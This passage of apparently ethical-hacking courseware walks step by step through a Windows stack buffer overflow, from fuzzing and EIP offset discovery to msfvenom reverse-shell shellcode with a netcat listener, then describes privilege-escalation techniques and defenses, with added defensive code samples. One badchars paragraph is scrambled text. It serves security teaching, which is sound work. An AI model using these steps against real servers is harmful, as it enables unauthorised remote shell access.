  nc -nv <Target IP> <Target Port>

  Figure 6.44: Screenshot of Netcat
- Step 2: Generate spike templates and perform spiking

  Spike templates define the package formats used for communicating with the vulnerable server. They are useful for testing and identifying functions vulnerable to buffer overflow exploitation. Use the following spike template for spiking on the STATS function:

  Figure 6.45: Screenshot showing STATS spike template

  Now, send the packages to the vulnerable server using the following command:

  generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR SKIPSTR

  Figure 6.46: Screenshot showing the output of spiking the vulnerable server
  Figure 6.47: Screenshot of Immunity Debugger

  As we have identified that the STATS function is not vulnerable to buffer overflow, we repeat the same process for the TRUN function. Use the following spike template for spiking on the TRUN function:

  Figure 6.48: Screenshot showing TRUN spike template

  Now, send the packages to the vulnerable server using the following command:

  generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR SKIPSTR

  Figure 6.49: Screenshot showing the output of spiking the vulnerable server

  As shown in the screenshot, the TRUN function of the vulnerable server has a buffer overflow vulnerability. Spiking this function overwrites stack registers such as EAX, ESP, EBP, and EIP. If attackers can overwrite the EIP register, they can gain shell access to the target system.

  Figure 6.50: Screenshot of Immunity Debugger showing buffer overflow vulnerability
Perform Fuzzing

After identifying the buffer overflow vulnerability in the target server, we must perform fuzzing. Attackers use fuzzing to send a large amount of data to the target server so that it experiences buffer overflow and overwrites the EIP register. Fuzzing helps in identifying the number of bytes required to crash the target server. This information helps in determining the exact location of the EIP register, which further helps in injecting malicious shellcode.

For example, the screenshot below shows the sample Python script used by attackers to perform fuzzing:

Figure 6.51: Screenshot showing Python script for fuzzing

When you execute the above code, buff multiplies for every iteration of the while loop and sends the buff data to the vulnerable server. As shown in the screenshots, the vulnerable server crashed after receiving approximately 2300 bytes of data, but it did not overwrite the EIP register.

Figure 6.52: Screenshot of Immunity Debugger showing vulnerable server before buffer overflow

Figure 6.53: Screenshot showing the output of fuzzing the vulnerable server
Identify the Offset

Through fuzzing, we have understood that we can overwrite the EIP register with 1 to 2300 bytes of data. Now, we will use the following pattern_create Ruby tool to generate random bytes of data:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Figure 6.55: Screenshot showing Metasploit pattern_create output

Run the following Python script to send these random bytes to the vulnerable server:

Figure 6.56: Screenshot of Python script sending random bytes to the server

When the above script is executed, random bytes of data are sent to the target vulnerable server, which causes a buffer overflow in the stack. The screenshot clearly shows that the EIP register is overwritten with random bytes. You must note down the random bytes in EIP and find the offset of those bytes.

Figure 6.57: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow

Run the following command to find the exact offset of the random bytes in the EIP register:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Figure 6.58: Screenshot showing Metasploit pattern_offset output
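To show what pattern_create.rb and pattern_offset.rb compute, the following Python example (added for this edit; not Metasploit's or the courseware's code) rebuilds the same "Aa0Aa1Aa2..." cyclic pattern, converts the little-endian dword 386F4337 seen in EIP back to the four pattern characters, and finds the 2003-byte offset reported in the next step; it also checks that every 4-byte window of the pattern is unique, which is why one crash value maps to exactly one offset.

```python
import string
import struct


def pattern_create(length):
    """Generate the Metasploit-style cyclic pattern 'Aa0Aa1Aa2...' of `length` bytes.

    Each 3-byte group is (upper, lower, digit) with the digit cycling fastest,
    so the pattern only repeats after 26 * 26 * 10 groups (20280 bytes).
    """
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def eip_to_bytes(eip_hex):
    """Convert the dword shown in EIP (e.g. '386F4337') to the 4 pattern characters.

    x86 stores dwords little-endian, so 0x386F4337 sits in memory as the bytes
    37 43 6F 38, i.e. the text '7Co8' that overwrote the return address.
    """
    return struct.pack("<I", int(eip_hex, 16)).decode("ascii")


def pattern_offset(length, needle):
    """Offset of `needle` inside the pattern of `length` bytes, or None if absent."""
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def all_windows_unique(length, width=4):
    """True when no `width`-byte substring repeats in the pattern, i.e. a value
    read from a register identifies a single position."""
    pattern = pattern_create(length)
    seen = set()
    for i in range(len(pattern) - width + 1):
        window = pattern[i:i + width]
        if window in seen:
            return False
        seen.add(window)
    return True


def main():
    print(pattern_create(24))                       # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    chars = eip_to_bytes("386F4337")                 # '7Co8'
    print(chars, pattern_offset(3000, chars))        # 7Co8 2003
    print(all_windows_unique(3000, 4))               # True
    print(all_windows_unique(3000, 2))               # False: 'Aa' repeats every group


if __name__ == "__main__":
    main()
```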
Overwrite the EIP Register

As shown in the screenshot, we have identified that the EIP register is at an offset of 2003 bytes. Now, run the following Python script to check whether we can control the EIP register.

Figure 6.59: Screenshot of Python script injecting shellcode in the EIP register

As shown in the screenshot, the EIP register can be controlled and overwritten with malicious shellcode.
Identify Bad Characters

Before injecting the shellcode into the EIP register, you must first identify bad characters that may cause issues in the shellcode. You can obtain the badchars through a Google search. Characters such as the null byte, i.e., "\x00", are badchars.

badchars = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Next, run the following Python script to send badchars along with the shellcode:
InImmunityDebugger,
661: Screenshotof Python
Figure

on
the
seit
right-click ESPregistervalue,
for
sending
badchas,
in
thenclickon “Follow Dump,―
and
finally Youwill find that thereare n o badcharsthat create problems
observethe characters. in
theshellcode.

Identify the Right Module

Figure 6.62: Screenshot of Immunity Debugger showing ESP dump

In this step, we must identify the right module of the vulnerable server that lacks memory protection. In Immunity Debugger, you can use scripts such as mona.py to identify such modules. You must download mona.py from GitHub and copy it to the path Immunity Debugger > PyCommands. Now, run the vulnerable server and the Immunity Debugger as Administrator, and attach the vulnerable server to the debugger.

In Immunity Debugger, type !mona modules in the bar at the bottom of the window. As shown in the screenshot, a pop-up window is created, which shows the protection settings of various modules.

Figure 6.63: Screenshot of Immunity Debugger showing mona modules

As shown in the screenshot, one of the modules, essfunc.dll, lacks memory protection. Attackers exploit such modules to inject shellcode and take full control of the EIP register.
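The "protection settings" that mona reports for each module come from flags in the module's own PE header. The following C program is an added example (it is not part of the courseware or of mona.py) that reads two of those flags, DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP), so a defender can check a module the same way before it ships. The in-memory PE header it parses is constructed with only the fields the parser reads; mona's Rebase and SafeSEH columns come from other structures and are not covered here.

```c
/* Added example (not from the courseware or mona.py): read the flags that
 * tell a defender whether a module opts in to ASLR and DEP.
 * Layout follows the PE/COFF format: e_lfanew at 0x3c, "PE\0\0", a 20-byte
 * COFF header, then the optional header with DllCharacteristics at offset 70
 * (same offset for PE32 and PE32+). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DLLCHAR_DYNAMIC_BASE 0x0040   /* IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE */
#define DLLCHAR_NX_COMPAT    0x0100   /* IMAGE_DLLCHARACTERISTICS_NX_COMPAT */

struct pe_protections {
    int valid;  /* 1 if the buffer parsed as a PE32/PE32+ image */
    int aslr;   /* DYNAMIC_BASE set: image may be relocated at load */
    int dep;    /* NX_COMPAT set: data pages marked non-executable */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

struct pe_protections pe_protections(const uint8_t *img, size_t len) {
    struct pe_protections r = {0, 0, 0};
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return r;
    uint32_t pe_off = rd32(img + 0x3c);
    /* signature (4) + COFF header (20) + optional header up to offset 72 */
    if (pe_off > len || len - pe_off < 4 + 20 + 72) return r;
    if (memcmp(img + pe_off, "PE\0\0", 4) != 0) return r;
    const uint8_t *opt = img + pe_off + 4 + 20;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b) return r;    /* PE32 or PE32+ */
    uint16_t dllchar = rd16(opt + 70);
    r.valid = 1;
    r.aslr = (dllchar & DLLCHAR_DYNAMIC_BASE) != 0;
    r.dep = (dllchar & DLLCHAR_NX_COMPAT) != 0;
    return r;
}

/* Builds a minimal constructed PE header (MZ stub, PE signature, PE32 magic,
 * DllCharacteristics) so the check can run without a real DLL on disk. */
size_t make_test_pe(uint8_t *buf, size_t cap, uint16_t dllchar) {
    const uint32_t pe_off = 0x80;
    size_t need = pe_off + 4 + 20 + 96;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3c] = (uint8_t)pe_off;                 /* e_lfanew, little-endian */
    memcpy(buf + pe_off, "PE\0\0", 4);
    uint8_t *opt = buf + pe_off + 24;
    opt[0] = 0x0b; opt[1] = 0x01;                /* Magic = 0x10b (PE32) */
    opt[70] = (uint8_t)(dllchar & 0xff);
    opt[71] = (uint8_t)(dllchar >> 8);
    return need;
}

/* Returns 1 when a module with both flags is reported protected and a module
 * with neither (the essfunc.dll situation) is reported unprotected. */
int pe_protections_demo(void) {
    uint8_t buf[256];
    size_t n = make_test_pe(buf, sizeof buf, DLLCHAR_DYNAMIC_BASE | DLLCHAR_NX_COMPAT);
    struct pe_protections hard = pe_protections(buf, n);
    n = make_test_pe(buf, sizeof buf, 0);
    struct pe_protections weak = pe_protections(buf, n);
    return hard.valid && hard.aslr && hard.dep && weak.valid && !weak.aslr && !weak.dep;
}

int main(void) {
    printf("PE protection demo: %s\n", pe_protections_demo() ? "ok" : "failed");
    return 0;
}
```

On a real host you would read the first few hundred bytes of the DLL file into the buffer instead of calling make_test_pe; a module that reports aslr = 0 is the kind of fixed-address module that makes a JMP ESP address reusable across reboots.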
Now, run the following nasm_shell Ruby script to convert assembly language (JMP ESP) into hex code:

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

Figure 6.64: Screenshot showing nasm_shell Metasploit output

Next, in Immunity Debugger, type the following command in the bar at the bottom of the window to determine the return address of the vulnerable module:

!mona find -s "\xff\xe4" -m essfunc.dll

Figure 6.65: Screenshot of Immunity Debugger showing return address of vulnerable module

In Immunity Debugger, select "Enter expression to follow", enter the identified return address in the text box, click "OK", and press "F2" to set up a breakpoint at that particular address.

Now, inject the identified return address into EIP by running the following script:

For example, if the return address is "625011af", then you must send "\xaf\x11\x50\x62", as the x86 architecture stores values in the Little Endian format.

Figure 6.67: Screenshot of Python script for overwriting EIP

When you run the above script, you will notice that the EIP register has been overwritten with the return address of the vulnerable module:

Figure 6.68: Screenshot of Immunity Debugger showing EIP register

As shown in the screenshot, attackers can control the EIP register if the target server has modules that do not have proper memory protection settings.

Generate Shellcode and Gain Shell Access

Now, run the following msfvenom command to generate the shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port> EXITFUNC=thread -f c -a x86 -b "\x00"

In the above command, -p > payload, LHOST > attacker's IP, LPORT > attacker's port, -f > file type, -a > architecture, and -b > bad characters.

Figure 6.69: Screenshot showing the output of msfvenom

Now, run the following Python script to inject the generated shellcode into the EIP register and gain shell access to the target vulnerable server:

Figure 6.70: Screenshot of Python script for overwriting EIP

Before running the above script, run the following Netcat command to listen on port 4444:

nc -nvlp 4444

Figure 6.71: Screenshot of Netcat

Next, run the above Python script to gain shell access to the target vulnerable server:

Figure 6.72: Screenshot of Netcat showing remote shell access

Figure 6.73: Screenshot showing remote access to Admin account

Buffer Overflow Detection Tools

Various buffer overflow detection tools that help security professionals to detect buffer overflow vulnerabilities are discussed below:

• OllyDbg

Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft® Windows®. Its emphasis on binary code analysis makes it particularly useful when the source is unavailable. It debugs multithread applications and attaches to running programs. It recognizes complex code constructs, such as a call to jump to the procedure. It dynamically traces stack frames and program execution, and it logs arguments of known functions.

Figure 6.74: Screenshot of OllyDbg

Some additional buffer overflow detection tools are as follows:

• Veracode (https://www.veracode.com)
• Flawfinder (https://dwheeler.com)
• Kiuwan (https://www.kiuwan.com)
• Splint (https://github.com)
• BOVSTT (https://github.com)

Defending against Buffer Overflows

The following countermeasures can be adopted to defend against buffer overflow attacks:

• Develop programs by following secure coding practices and guidelines
• Use the address space layout randomization (ASLR) technique, which randomly moves around the address space locations of the data region
• Validate arguments and minimize code that requires root privileges
• Perform code review at the source-code level using static and dynamic code analyzers
• Allow the compiler to add bounds to all the buffers
• Implement automatic bound checking
• Always protect the return pointer on the stack
• Never allow execution of code outside the code space
• Regularly patch applications and operating systems
• Perform code inspection manually with a checklist to ensure that the code meets certain criteria
• Employ non-executable stacks, i.e., data execution prevention (DEP), which can mark the stack or memory regions as non-executable to prevent exploitation
• Implement code pointer integrity checking to detect whether a code pointer has been corrupted before it is dereferenced
• Scrutinize the code thoroughly to avoid possible errors by performing testing and debugging
• Perform automated and manual code auditing
• Avoid using unsafe functions and use strncat instead of strcat and strncpy instead of strcpy
• Use the NX bit to mark certain areas of memory as executable and non-executable
• Digitally sign the code before launching the program
• Ensure that all the control transfers are encompassed by a trusted and approved code image
• Adopt deep packet inspection (DPI) for detecting remote exploitation attempts at the network perimeter using attack signatures
• Consider altering the rules at the operating-system level where the memory pages can hold executable data
• Use IDS solutions to detect behavior that simulates an attack
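The list above says to replace strcpy with strncpy. The C program below is an added example (not from the courseware) that puts the unbounded copy next to a bounded one and also shows the caveat a code reviewer would raise: strncpy alone does not write a terminator when the source fills the buffer, so the safe version checks the length explicitly. NAME_MAX and the sample names are constructed.

```c
/* Added example, not from the courseware: an unbounded copy of the kind the
 * list warns against, beside a bounded replacement, plus a demonstration of
 * why "strncpy instead of strcpy" is not sufficient on its own. */
#include <stdio.h>
#include <string.h>

#define NAME_MAX 16   /* constructed buffer size for the demo */

/* 'Before': no bounds check. A source longer than NAME_MAX-1 bytes overwrites
 * whatever follows dst on the stack (saved frame pointer, return address).
 * Kept only to show the defect. */
int copy_unsafe(char dst[NAME_MAX], const char *src) {
    strcpy(dst, src);
    return 0;
}

/* 'After': rejects input that does not fit (including the terminator) and
 * never leaves dst unterminated. Returns 0 on success, -1 on rejection. */
int copy_safe(char dst[NAME_MAX], const char *src) {
    size_t n = strlen(src);
    if (n >= NAME_MAX) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* n+1 copies the NUL as well */
    return 0;
}

/* Returns 1 if strncpy left the buffer without a terminator: a source of
 * exactly NAME_MAX bytes fills dst and the NUL is dropped. */
int strncpy_leaves_unterminated(void) {
    char dst[NAME_MAX];
    memset(dst, 'A', sizeof dst);
    strncpy(dst, "0123456789abcdef", NAME_MAX);   /* 16 chars, no room for NUL */
    return memchr(dst, '\0', NAME_MAX) == NULL;
}

/* Exercises both outcomes of copy_safe on constructed input; returns 1 when
 * the short name is accepted verbatim and the long one is refused with dst
 * left empty. For in-bounds input the unsafe copy behaves identically, which
 * is exactly why the defect survives ordinary testing. */
int copy_safe_demo(void) {
    char buf[NAME_MAX];
    if (copy_safe(buf, "admin") != 0 || strcmp(buf, "admin") != 0) return 0;
    if (copy_safe(buf, "0123456789abcdef") != -1 || buf[0] != '\0') return 0;
    if (copy_unsafe(buf, "guest") != 0 || strcmp(buf, "guest") != 0) return 0;
    return 1;
}

int main(void) {
    printf("bounded copy demo: %s\n", copy_safe_demo() ? "ok" : "failed");
    printf("strncpy terminates a full buffer: %s\n",
           strncpy_leaves_unterminated() ? "no" : "yes");
    return 0;
}
```

The compiler-side items in the list map to real build flags: -fstack-protector-strong places a canary before the saved return pointer, -D_FORTIFY_SOURCE=2 (with -O1 or higher) turns known-size strcpy/memcpy calls into checked variants, and linking with -Wl,-z,noexecstack requests a non-executable stack.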

Escalating Privileges

Escalating privileges is the second stage of system hacking. Attackers use passwords obtained in the first step to gain access to the target system and then try to attain higher-level privileges in the system. The various tools and techniques attackers use to escalate their privileges are described as follows.
Privilege Escalation

Privileges are a security role assigned to users for using specific programs, features, OSs, functions, files or codes, etc., to limit their access by different types of users. If a user is assigned more privileges, he/she can modify or interact with more restricted parts of the system or application than less privileged users. Attackers initially gain system access with low privilege and then try to gain more privileges to perform activities restricted from less privileged users. A privilege escalation attack is the process of gaining more privileges than were initially acquired.

Figure 6.75: Example of privilege escalation

In a privilege escalation attack, attackers first gain access to the network using a non-admin user account and then try to gain administrative privileges. Attackers employ design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.

Once an attacker has gained access to a remote system with a valid username and password, he/she will attempt to escalate the user account to one with increased privileges, such as that of an administrator, to perform restricted operations. These privileges allow the attacker to view critical/sensitive information, delete files, or install malicious programs such as viruses, Trojans, worms, etc.
Types of Privilege Escalation

Privilege escalation is required when you want to access the system resources that you are not authorized to access. Privilege escalation takes place in two forms: vertical privilege escalation and horizontal privilege escalation.

• Horizontal Privilege Escalation: In a horizontal privilege escalation, the unauthorized user tries to access the resources, functions, and other privileges that belong to an authorized user who has similar access permissions. For instance, online banking user A can easily access user B's bank account.

• Vertical Privilege Escalation: In a vertical privilege escalation, the unauthorized user tries to gain access to the resources and functions of a user with higher privileges, such as application or site administrators. For example, someone using online banking can access the site using administrative functions.

Privilege Escalation Using DLL Hijacking

Most Windows applications do not use the fully qualified path when loading an external DLL library; instead, they first search the directory from which they have been loaded. Taking this as an advantage, if attackers can place a malicious DLL in the application directory, the application will execute the malicious DLL in place of the real DLL. For example, if an application "program.exe" needs library.dll (usually in the Windows system directory) to install the application, and fails to specify the library.dll path, Windows will search for the DLL in the directory from which the application was launched. If an attacker has already placed the DLL in the same directory as program.exe, then that malicious DLL will load instead of the real DLL, which allows the attacker to gain remote access to the target system.
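The developer-side fix for the search described above is to never let the loader search at all. The following C program is an added example (not from the courseware) of that fix: it accepts only a bare DLL file name and joins it to a trusted directory, so a library.dll dropped next to program.exe is never a candidate. TRUSTED_DIR is a constructed sample; on a Windows build the real system directory is obtained from GetSystemDirectoryA and the load goes through LoadLibraryExA with LOAD_LIBRARY_SEARCH_SYSTEM32, while on other platforms only the path logic is compiled.

```c
/* Added example, not from the courseware: load a DLL by fully qualified path
 * from a trusted directory instead of letting Windows walk the search order. */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

#define TRUSTED_DIR "C:\\Windows\\System32"   /* constructed sample value */

/* Joins name to trusted_dir. Returns 1 on success; 0 if name contains a
 * directory separator or drive letter, is "." or "..", is empty, or does not
 * fit in out. */
int build_dll_path(const char *trusted_dir, const char *name, char *out, size_t cap) {
    if (name[0] == '\0' || strpbrk(name, "\\/:") != NULL) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    size_t d = strlen(trusted_dir), n = strlen(name);
    if (d + 1 + n + 1 > cap) return 0;
    memcpy(out, trusted_dir, d);
    out[d] = '\\';
    memcpy(out + d + 1, name, n + 1);   /* n+1 copies the NUL */
    return 1;
}

/* Wrapper over the constructed TRUSTED_DIR; returns NULL when the name is
 * rejected. Uses a static buffer, valid until the next call. */
const char *resolve_trusted_dll(const char *name) {
    static char full[260];
    return build_dll_path(TRUSTED_DIR, name, full, sizeof full) ? full : NULL;
}

#ifdef _WIN32
/* Hardened load on a real Windows host: fully qualified path, and the search
 * flag also keeps the DLL's own dependencies out of the application directory. */
HMODULE load_trusted_dll(const char *name) {
    char sysdir[MAX_PATH], full[MAX_PATH];
    if (GetSystemDirectoryA(sysdir, sizeof sysdir) == 0) return NULL;
    if (!build_dll_path(sysdir, name, full, sizeof full)) return NULL;
    return LoadLibraryExA(full, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif

int main(void) {
    const char *ok = resolve_trusted_dll("library.dll");
    const char *bad = resolve_trusted_dll("..\\library.dll");
    printf("library.dll    -> %s\n", ok ? ok : "(rejected)");
    printf("..\\library.dll -> %s\n", bad ? bad : "(rejected)");
    return 0;
}
```

The name filter matters as much as the full path: a name containing "..\" or a drive letter would let a caller-supplied string escape the trusted directory even though the path is technically fully qualified.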

Figure 6.76: Example of privilege escalation using DLL hijacking

Attackers use tools such as Robber and PowerSploit to detect hijackable DLLs and perform DLL hijacking on the target system:

• Robber

Source: https://github.com

Robber is an open-source tool that helps attackers to find executables prone to DLL hijacking. Attackers use Robber to find out which DLLs an executable requests without an absolute path (triggering this search process); attackers can then place their malicious DLL high up the search path so it gets invoked before the original DLL.

Figure 6.77: Screenshot of Robber showing injectable DLLs
Privilege Escalation by Exploiting Vulnerabilities

Vulnerability is the existence of a weakness, design flaw, or implementation error that can lead to an unexpected event compromising the security of the system. An attacker employs these vulnerabilities to perform various attacks on the confidentiality, availability, or integrity of a system. The software design flaws and programming errors lead to security vulnerabilities. Attackers exploit these software vulnerabilities, such as programming flaws in a program or service, or within the OS software or kernel, to execute malicious code. Exploiting software vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than the existing ones or bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.

There are many public vulnerability repositories available online that allow access to information about various software vulnerabilities. Attackers search for exploits that are based on the OS and software application on exploit sites such as SecurityFocus (https://www.securityfocus.com) or Exploit Database (https://www.exploit-db.com) and use these exploits to gain high privileges.

Figure 6.78: Screenshot of Exploit DB showing privilege escalation vulnerabilities

Privilege Escalation Using Dylib Hijacking

Similar to Windows, OS X is also vulnerable to dynamic library attacks. OS X provides several legitimate methods, such as setting the DYLD_INSERT_LIBRARIES environment variable, which are user specific. These methods force the loader to automatically load malicious libraries into a target running process. OS X allows the loading of weak dylibs (dynamic libraries) dynamically, which in turn allows an attacker to place a malicious dylib in the specified location. In many cases, the loader searches for dynamic libraries in multiple paths. This helps an attacker to inject a malicious dylib in one of the primary directories and simply load the malicious dylib at runtime. Attackers can utilize such methods to perform various malicious activities such as stealthy persistence, run-time process injection, bypassing security software, and bypassing Gatekeeper.

Figure 6.79: Example of privilege escalation using Dylib hijacking

Dylib Hijack Scanner helps attackers to detect dylibs that are vulnerable to hijacking attacks. After identifying vulnerable dylibs, attackers use tools such as DylibHijack to perform dylib hijacking on the target system.
Privilege Escalation Using Spectre and Meltdown Vulnerabilities

Spectre and Meltdown are recent CPU vulnerabilities found in the design of modern processors, including chips from AMD, ARM, and Intel, caused by performance optimizations in these processors. Attackers may exploit these vulnerabilities to gain unauthorized access and steal critical system information such as login credentials, secret keys, keystrokes, encryption keys, etc. stored in the application's memory to escalate privileges. These attacks can be performed because the normal verification of the user's privileges is disrupted through the interaction of features like branch prediction, out-of-order execution, caching, and speculative execution. Using these vulnerabilities, attackers can exploit various IT resources, such as most OSs, servers, PCs, cloud systems, and mobile devices.
• Spectre Vulnerability

The Spectre vulnerability is found in many modern processors, including Apple, AMD, ARM, Intel, Samsung, and Qualcomm processors. This vulnerability allows attackers to trick a processor into exploiting speculative execution to read restricted data. Modern processors implement speculative execution to predict the future to complete the execution faster. For example, if the chip identifies that a program includes multiple conditional statements, it will start executing and concluding all the possible outputs before the program does. Attackers may exploit this vulnerability in different ways:

o The processor is forced to accomplish a speculative execution of a read before bound checking is performed. Consequently, an attacker can access and read out-of-bounds memory locations.

o When executing conditional statements, for faster processing, the processors use branch prediction to pick a path to execute speculatively. Attackers may exploit this feature to force the processor to take an improper speculative decision and further access data out of range.

Attackers may use this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized. This vulnerability helps attackers to extract confidential information, such as credentials stored in the browser, from that target process. In certain cases, using this vulnerability, an attacker can even read the kernel memory or perform a web-based attack using JavaScript.

• Meltdown Vulnerability

Meltdown vulnerability is found in all Intel and ARM processors deployed by Apple. This vulnerability allows attackers to trick a process into accessing out-of-bounds memory by exploiting CPU optimization mechanisms such as speculative execution. For example, an attacker requests to access an illegal memory location. He/she sends a second request to read a valid memory location conditionally. In this case, a processor using speculative execution will complete evaluating the result for both requests before checking the first request. When the processor checks that the first request is invalid, it rejects both requests after checking the privileges. Even though the processor rejects both the requests, the results of both the requests remain in the cache memory. Now the attacker sends multiple valid requests to access out-of-bounds memory locations. Attackers may use this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations, such as kernel memory and physical memory. This leads to critical system information such as credentials, private keys, etc. being revealed.
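The first Spectre case above, a read that runs ahead of its bounds check, has a well-known source-level mitigation: clamp the index with arithmetic instead of relying on the branch. The C program below is an added example (not from the courseware) showing the checked read beside an index-masked version; the mask follows the pattern behind the Linux kernel's array_index_nospec. The table contents are constructed.

```c
/* Added example, not from the courseware: a bounds-checked read that
 * speculation can run past, beside an index-masked version that stays inside
 * the table even when the branch is mispredicted (Spectre variant 1). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TABLE_SIZE 16
static const uint8_t table[TABLE_SIZE] = {          /* constructed contents */
    10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25
};

/* 'Before': architecturally correct, but the check is a branch the CPU
 * predicts, so table[idx] may be loaded speculatively for any idx. */
uint8_t read_checked(size_t idx) {
    if (idx < TABLE_SIZE)
        return table[idx];
    return 0;
}

/* All ones when idx < size, all zeros otherwise, computed without a branch.
 * The top bit of (idx | (size - idx - 1)) is set exactly when idx >= size,
 * for idx and size below 2^63. */
size_t index_mask_nospec(size_t idx, size_t size) {
    size_t top = (idx | (size - idx - 1)) >> (sizeof(size_t) * 8 - 1);
    return top - 1;   /* 0 -> SIZE_MAX, 1 -> 0 */
}

/* 'After': same result for callers, but the index used by the load is masked
 * to the valid range regardless of how the branch was predicted. */
uint8_t read_nospec(size_t idx) {
    if (idx >= TABLE_SIZE)
        return 0;
    idx &= index_mask_nospec(idx, TABLE_SIZE);
    return table[idx];
}

int main(void) {
    printf("read_nospec(3)   = %u\n", read_nospec(3));
    printf("read_nospec(100) = %u\n", read_nospec(100));
    return 0;
}
```

Production code wraps the mask computation in a compiler barrier so the optimizer cannot turn it back into a branch, and this addresses only the bounds-check case; Meltdown is handled by the OS and microcode (kernel page-table isolation), not by application code.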

Privilege Escalation using Named Pipe Impersonation

In Windows OS, named pipes are used to provide legitimate communication between running processes. In this technique, the messages are exchanged between the processes using a file. For example, if process A wants to send a message to another process B, then process A writes the message to a file and process B reads the message from that file. Attackers often exploit this technique to escalate their privileges on the victim system to a user account with higher privileges.

In any Windows system, when a process creates a pipe, it will act as a pipe server. If any other process wants to communicate with this process, it will connect to this pipe and it becomes a pipe client. When a client connects to the pipe, the pipe server can utilize the access privileges and security context of the pipe client. Attackers exploit this feature by creating a pipe server with fewer privileges and trying to connect with a client with higher privileges than the server. Attackers use tools such as Metasploit to perform named pipe impersonation on a target host.

Attackers exploit vulnerabilities that exist in the target remote host to obtain an active session and use Metasploit commands such as getsystem to gain administrative-level privileges and extract password hashes of the admin/user accounts.

Figure 6.82: Screenshot of Metasploit showing dump of password hashes

Privilege Escalation by Exploiting Misconfigured Services

Attackers generally exploit zero-day vulnerabilities that exist in target systems to escalate privileges. If attackers are unable to find such exploits, they try to escalate privileges by abusing misconfigured services in the target OS. Insecure or improper configuration of system services allows attackers to elevate their privileges in the target system. For example, attackers exploit misconfigured services such as unquoted service paths, service object permissions, unattended installs, modifiable registry autoruns and configurations, etc. to elevate access privileges.

Attackers use tools such as Metasploit to obtain an active session with the target host. After establishing an active session, attackers use tools such as PowerSploit to detect misconfigured services that exist in the target OS.

Figure 6.83: Screenshot of Metasploit showing shell access to the target system

• Unquoted Service Paths

In Windows OSs, when a service starts running, the system attempts to find the location of the executable file to launch the service successfully. Generally, the executable path is enclosed in quotation marks "", so that the system can easily locate the application binary. Some executable files may not include quoted paths and include whitespace in between; in this scenario, the system tries to find the application with unquoted paths by searching all the folders that exist in the path until the executable binary is found. Attackers exploit services running under SYSTEM privileges to elevate their privileges.

Figure 6.84: Screenshot of Metasploit showing execution of PowerSploit to detect unquoted service paths
